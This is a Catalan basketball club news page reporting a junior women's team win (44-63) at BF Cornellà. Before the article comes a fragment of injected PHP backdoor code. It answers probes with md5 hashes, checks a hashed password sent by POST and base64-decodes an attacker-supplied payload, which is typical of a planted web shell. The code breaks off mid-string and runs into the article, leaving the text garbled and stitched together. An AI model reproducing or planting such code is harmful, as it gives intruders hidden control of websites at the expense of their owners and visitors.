function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El júnior femení A pateix contra la defensa del BF Cornellà però guanya gràcies a un gran últim període (44-63) - Tgn Bàsquet Club -

El júnior femení A pateix contra la defensa del BF Cornellà però guanya gràcies a un gran últim període (44-63)

Updated: desembre 17, 2019

L’equip júnior femení A del TGN Bàsquet va aconseguir una victòria molt treballada a la pista del Bàsquet Femení Cornellà. La defensa de les locals, molt intensa, va posar moltes dificultats en els atacs de les tarragonines, poc decidides de cara a cistella. Les liles van estar, a més, massa “toves” en defensa i això va provocar un partit molt igualat (26-30 al descans) que no es va decidir fins als útims deu minuts del matx. Aleshores les visitants van trobar en l’encert exterior la manera de trencar la defensa local. El control del rebot defensiu va aportar solidesa i el resultat va ser un parcial de 7-19 que va ser definitiu.